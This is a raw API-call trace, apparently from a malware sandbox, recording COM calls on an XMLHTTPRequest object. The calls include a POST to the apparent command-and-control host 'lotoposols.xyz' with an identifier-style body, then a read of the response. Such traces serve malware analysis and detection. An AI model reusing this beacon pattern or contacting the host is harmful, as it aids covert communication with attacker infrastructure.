	[0130.476] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0130.476] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0130.476] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0130.476] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0130.477] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0130.477] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0130.477] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0130.477] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0130.477] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0130.478] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0130.478] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0130.478] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0130.478] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0130.478] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0130.478] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0130.478] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0130.478] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0130.478] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0130.478] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0130.481] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0130.481] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0130.481] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0130.481] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0130.481] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0130.481] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0130.481] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0130.482] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0130.482] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0130.482] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0130.482] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0130.482] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0130.483] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0130.483] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0130.483] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0130.483] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0130.483] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0130.483] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0130.483] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0130.483] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0130.483] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0130.483] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x112f38 | out: ppvObject=0x112f38*=0x0) returned 0x80004002
	[0130.483] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0130.484] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0130.484] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a53a68 | out: ppvObject=0x5a53a68*=0x0) returned 0x80004002
	[0130.484] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0140.689] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0140.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0140.689] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0140.689] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
